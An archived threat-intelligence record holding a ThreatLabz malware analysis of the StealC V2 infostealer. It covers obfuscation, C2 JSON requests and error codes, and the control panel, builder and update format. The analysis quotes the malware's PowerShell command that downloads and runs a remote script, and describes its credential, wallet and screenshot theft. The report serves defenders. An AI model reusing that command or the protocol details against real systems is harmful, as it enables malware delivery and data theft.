{
	"id": "a92b07e6-84e4-41db-9eef-c15a47c39481",
	"created_at": "2026-04-06T00:12:44.917609Z",
	"updated_at": "2026-04-10T13:12:40.151005Z",
	"deleted_at": null,
	"sha1_hash": "b197e2407d30577e4f552b7169deccabd78f5bcd",
	"title": "I StealC You: Tracking the Rapid Changes To StealC | ThreatLabz",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 574202,
	"plain_text": "I StealC You: Tracking the Rapid Changes To StealC | ThreatLabz\r\nBy ThreatLabz\r\nPublished: 2025-05-01 · Archived: 2026-04-05 12:37:59 UTC\r\nTechnical Analysis\r\nA thorough technical analysis of StealC V2 was published by another researcher. However, in the following sections, we delve into additional technical information that complements prior open source reporting.\r\nSimilar to StealC V1, many StealC V2 samples are packed using Themida, a commercial code protection tool, which is designed to hinder reverse engineering. Additionally, the malware obfuscates nearly all the strings it uses during execution and employs a two-stage deobfuscation process, which was also observed in StealC V1.\r\nThe following matrix shows a comparison between features available in StealC V1 and StealC V2.\r\n
Feature | StealC Version 1 | StealC Version 2\r\nAnti-VM checks | Yes | No\r\nSupports specifying a custom port or using HTTPS | Yes | No\r\nEstablishes persistence | No | No\r\nDownloads third-party DLLs from the C2 server | Yes | No\r\nExecutes DLL payloads | Yes | No\r\nExecutes EXE payloads | Yes | Yes\r\nExecutes MSI file payloads | No | Yes\r\nExecutes PowerShell script payloads | No | Yes\r\nCompiled for x64 architectures | No | Yes\r\nUses RC4 encryption for network communications | No | Yes (implemented in 2.1.1)\r\nDecrypts stolen data server-side | No | Yes\r\nSupports Chrome v20 application bound encryption | No | Yes\r\nEnables victim screenshot capture with multi-monitor support | No | Yes\r\nSupports unified file grabber functionality | No | Yes\r\nStreamlines and improves the control panel with an integrated builder | No | Yes\r\nTable 1: A matrix comparing features available in StealC V1 and StealC V2.\r\n
https://www.zscaler.com/blogs/security-research/i-stealc-you-tracking-rapid-changes-stealc\r\nPage 1 of 14\r\n
During the initial execution, StealC V2 decrypts important strings using a hardcoded RC4 key, along with an expiration date and information required for API resolution. If the current date is past the expiration date, the malware will terminate itself. The malware’s strings are stored in Base64 format and decrypted using RC4 encryption with a unique hardcoded key. Although the hardcoded keys may vary between samples, the builder integrated into the control panel does not change this RC4 key. Instead, the StealC V2 support team manages key updates for their clients, as we will discuss later.\r\n
StealC V2 performs several validation steps in addition to the expiration date check, including ensuring that no duplicate instances are running and that the system language is not one spoken in the Commonwealth of Independent States (CIS). At this point, the second deobfuscation routine takes place, decoding configuration strings such as the host and URL path of the C2 server, along with additional API DLLs and function names for future use during execution.\r\n
Those API functions are contained in the DLLs below:\r\nkernel32.dll\r\nadvapi32.dll\r\ngdiplus.dll\r\ncrypt32.dll\r\ngdi32.dll\r\nrstrtmgr.dll\r\nole32.dll\r\nwinhttp.dll\r\nuser32.dll\r\nshlwapi.dll\r\nshell32.dll\r\nntdll.dll\r\nnss3.dll\r\nwininet.dll\r\n
Notably, unlike V1, StealC V2 does not include strings related to virtual machine environments. StealC V2 also no longer makes requests to the C2 server to download third-party DLLs that were required for information stealing functionality.\r\n
New features\r\nStealC V1 was capable of executing EXE and DLL files. StealC V2 now supports downloading and executing payloads in three formats: executable (EXE) files, Microsoft Software Installer (MSI) packages, and PowerShell scripts. Depending on the loader configuration parameter provided by the C2 server in the initial response, this functionality can be triggered either before or after the data-stealing functions. The table below describes how each payload is executed.\r\n
Payload Type | Execution Method\r\nEXE files | Executed using the Windows API function ShellExecuteEx with up to 10 retry attempts if execution fails.\r\nMSI files | Installed using msiexec.exe with the silent /passive parameter, allowing for minimal user interaction. The malware retries up to 10 times if installation fails.\r\nPowerShell scripts | Executes a remote PowerShell script via the command powershell.exe -nop -c iex(New-Object Net.WebClient).DownloadString('[payload]'). If the execution fails, no retries are attempted.\r\nTable 2: New payload execution types supported by StealC V2.\r\n
RC4 encryption\r\nInterestingly, the RC4 encryption functionality was initially commented out in early versions of StealC V2. The most recent update has enabled RC4 encryption, indicating that the malware is under active development.\r\n
Updated network communication protocol\r\nStealC V2 utilizes standard JSON-based requests and responses for its C2 communication. The figure below illustrates the workflow of the C2 communication process.\r\nFigure 1: Shows StealC V2’s communications workflow.\r\n
Request\r\nThe C2 server accepts four operation types: create, upload_file, done, and loader. The create operation is always the first request, which registers the infection. The initial request always contains a bot ID (HWID) and the botnet ID (build), as shown in the example below.\r\n{\r\nbuild: \"main1\",\r\nhwid: \"A9CAA24C-E7F3-3B20-0F54-4BE8A7DC2330\",\r\ntype: \"create\"\r\n}\r\n
The HWID creation is based on the volume serial number from the system’s drive letter (or C: by default) and consists of 32 hexadecimal characters in a UUIDv4 format.\r\n
Response\r\nThe response from the C2 server contains essential elements that define the malware’s behavior and operational tasks. It includes the access_token, which the malware uses for all subsequent requests, as well as flags that specify target configurations, such as browser settings for data theft, crypto plugins for search and exfiltration, and files to target (e.g., cryptocurrency wallets, Steam, Outlook). Steam and Outlook paths are hardcoded into the binary, and their data is exfiltrated if the corresponding flags are enabled.\r\n
One notable feature in the C2 server's response is the inclusion of a random parameter, which adds variability to each message. This string consists of lowercase hexadecimal characters and ranges from 10 to 15 characters in length (e.g., c689cbd9ecfa3cc in the example below). This random key-value pair plays a critical role for RC4 encrypted messages: it ensures that each message is unique even though the same encryption key is repeatedly used. This technique is used to avoid static signatures for the responses.\r\n
An example response is shown below:\r\n{\r\n8b31887be2030b7: \"c689cbd9ecfa3cc\",\r\nopcode: \"success\",\r\naccess_token: \"f066fcda843438[..]f666733c11901ae74102df\",\r\nself_delete: 1,\r\ntake_screenshot: 1,\r\nloader: 0,\r\nsteal_steam: 0,\r\nsteal_outlook: 1,\r\nbrowsers: [],\r\nplugins: [],\r\nfiles: []\r\n}\r\n
Each response contains an opcode field that indicates the result of the request, such as success, blocked, error, or unknown, which are described in the next section.\r\n
Based on the panel files, a StealC V2 server generates specific error codes when it detects malformed or unexpected requests. By comparison, a StealC V1 server responded with an empty message, a block notification, or terminated the connection. The following table outlines the StealC V2 error codes and the conditions under which they are triggered.\r\n
Request | Explanation | Response\r\nAny request | Malformed message (not JSON compliant) | {\"opcode\": \"error\", \"code\": \"1000\"}\r\nAny request | Unknown packet (unknown type parameter) | {\"opcode\": \"unknown\"}\r\nAny request | Empty parameter or not present | {\"opcode\": \"error\"}\r\nAny request | Unencrypted message (after version 2.0.1) | {\"opcode\": \"block\"}\r\nupload_file request, done request, loader request | Empty access token | {\"opcode\": \"error5\"}\r\nupload_file request | Filename or data parameters not present | {\"opcode\": \"error4\"}\r\nupload_file request, done request, loader request | Malformed or unknown access token | {\"opcode\": \"error1\"}\r\nupload_file request | File was already sent by the bot | {\"opcode\": \"error3\"}\r\nupload_file request | Server couldn’t store file | {\"opcode\": \"error2\"}\r\ncreate request | Empty parameter or not present | {\"opcode\": \"error\"}\r\ncreate request | Already finished communication process or blocked IP | {\"opcode\": \"blocked\"}\r\ncreate request | Unable to register bot | {\"opcode\": \"error\"}\r\nTable 3: Error codes sent by the StealC V2 C2 server when an unexpected or malformed request is received.\r\n
Control panel and builder\r\nThreatLabz analyzed a StealC V2 C2 panel with an embedded builder as shown in the figure below.\r\nFigure 2: The StealC V2 control panel dashboard provides a summary of infection activity and stolen information.\r\nThreatLabz’s in-depth analysis of StealC V2’s infrastructure revealed several key findings:\r\n
Version control enforcement: The builder requires a version update that is provided in a ZIP archive to be uploaded via the framework's admin settings. This ensures that operators cannot install older versions than the most recently applied update.\r\nTelegram bot integration: The control panel supports Telegram bot integration for sending notifications and allows customization of message formats.\r\nRule-based payload delivery: Payload delivery depends on rules created by the operator, such as bot geolocation, build IDs, markers triggered, or identified software/processes during the information-gathering phase. These rules dictate how payload responses are generated.\r\nOngoing development: The panel is rapidly evolving, with partially implemented features like Firefox plugin loading. As previously mentioned, RC4 encryption for network communication was initially commented out. The recently released update (version 2.2.0) enabled RC4 encryption for network communications.\r\nEndpoint file handling: The control panel endpoint supports file-based uploads (e.g., multipart/form-data) similar to StealC V1 but now exclusively processes upload_file commands.\r\nIP and HWID-based blocking: The panel allows operators to block communications based on IP addresses (or IP masks) and specific HWIDs. Additionally, IP addresses can be automatically blocked for the remainder of the day after completing the communication process.\r\nFake 404 error for C2 discovery evasion: Early versions of the panel served fake 404 Not Found pages. However, a researcher noticed this fake response could be used to easily detect StealC V2 servers, and newer updates reportedly patched this behavior.\r\nBasic RC4 implementation: Despite the first StealC V2 advertisement claiming to implement a custom RC4 algorithm, the RC4 implementation used is standard.\r\n
The StealC V2 builder is embedded into the control panel interface, enabling operators to define loader rules, grabber rules, and markers (markers consist of wildcards that will be triggered if the content of the stolen passwords or cookies files match) for stolen data. For example, the threat actor could create a marker searching for strings containing coinbase.com in the contents of the exfiltrated password and cookies files as shown below.\r\nFigure 3: StealC V2 Marker rule which will search for coinbase.com.\r\n
Then the actor can create a loader rule that will be triggered when the marker matches. So if the victim’s files contain the marker’s search terms, the C2 will answer the loader request with the triggered loader’s URL as shown in the figure below.\r\nFigure 4: StealC V2 loader rule creation which will trigger when the Coinbase Marker matches.\r\n
These custom configurations are automatically merged with a build template file, which is a pre-configured StealC V2 binary. The builder only modifies the build parameter from the build template, leaving the build_id parameter in plaintext and set to the default value across all templates. Important elements such as the RC4 key, C2 address, and URL path are exclusively managed by the StealC V2 development team. Note that StealC V2 currently only supports HTTP communication on port 80.\r\n
Updates\r\nThe figure below shows the update interface in StealC V2’s control panel.\r\nFigure 5: StealC V2’s panel and builder update menu (with two updates applied).\r\n
After the StealC V2 control panel is set up, the installer script instructs the operator to contact support (the StealC seller) and send the control panel domain, the path for network communication, and the RC4 key created at install time. After receiving these parameters, the seller creates an update containing a builder template binary configured with the parameters from the installation script. Once the operator receives the builder template, they can use the control panel to create new StealC builds.\r\n
The update file is packaged as a ZIP archive containing the following components:\r\nversion.json: JSON file used by the panel to identify and install the update.\r\nbuild.exe: StealC V2 template binary.\r\nOptional patch files: Additional files that can replace specific existing files in the panel during the update process, ensuring seamless integration of new functionality or fixes.\r\n
The example below shows the contents of a version.json file. This file contains update information, which is read by the panel to identify and apply the changes included in the update.\r\n{\r\n \"version\": \"2.2.4\",\r\n \"admin_update\": true,\r\n \"gate_update\": true,\r\n \"db_update\": false,\r\n \"changes\": [\r\n {\"type\": \"gate\", \"description\": \"Fix build block requests v2\"}\r\n ]\r\n}\r\n
The table below describes fields inside the version.json file:\r\nField | Description\r\nversion | The StealC V2 bot version.\r\nadmin_update | A flag that instructs the updater to apply patches to the admin structure folder.\r\ngate_update | A flag that directs the updater to apply patches to the gate structure folder.\r\nchanges | A list of update messages detailing modifications, displayed within the panel.\r\ndb_update | Indicates updates or modifications to the panel's database model, specifically MySQL.\r\nTable 4: Parameters present in StealC V2’s update configuration file.\r\n
Comparing StealC builds\r\nAfter examining the builder templates included in the C2 panel, we compared different versions and identified key improvements in their development. The table below highlights the evolution of StealC across versions:\r\n
Template Version | Update File | Description\r\n2.0.1 | update.stealc_update | No obfuscation. All strings are stored in plaintext. Only a subset of API functions are resolved. No RC4 keys. Uses winhttp.dll APIs for communication. Configuration parameters are hardcoded.\r\n2.0.1 | 2.0.0.stealc_update | Implemented obfuscation. Added RC4 key to decrypt the malware’s strings. All API functions are resolved at runtime. Features a distinct structure that sets it apart from other versions. Encrypts configuration parameters using RC4.\r\n2.1.1 | 2.1.1.stealc_update | Features a code structure similar to more recent samples. First version using encryption/decryption routines for network communication with a single RC4 key that is also used for decrypting the malware’s strings.\r\n2.1.3 | 2.1.2.stealc_update | Identical to version 2.1.1.\r\n2.2.4 | 2.0.1.stealc_update | Includes an RC4 key for string decryption and another RC4 key for network encryption. Improved download of payloads (based on winhttp instead of wininet.dll). Added autodelete command.\r\nTable 5: Differences among the StealC V2 bot templates present in several update files.\r\n
Additionally, the latest version includes a self-delete routine, triggered based on the configuration flag (self_delete) received from the C2 server, which is very similar to the routine that StealC V1 used to erase the downloaded DLLs.\r\n
Source: https://www.zscaler.com/blogs/security-research/i-stealc-you-tracking-rapid-changes-stealc",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.zscaler.com/blogs/security-research/i-stealc-you-tracking-rapid-changes-stealc"
	],
	"report_names": [
		"i-stealc-you-tracking-rapid-changes-stealc"
	],
	"threat_actors": [],
	"ts_created_at": 1775434364,
	"ts_updated_at": 1775826760,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b197e2407d30577e4f552b7169deccabd78f5bcd.pdf",
		"text": "https://archive.orkl.eu/b197e2407d30577e4f552b7169deccabd78f5bcd.txt",
		"img": "https://archive.orkl.eu/b197e2407d30577e4f552b7169deccabd78f5bcd.jpg"
	}
}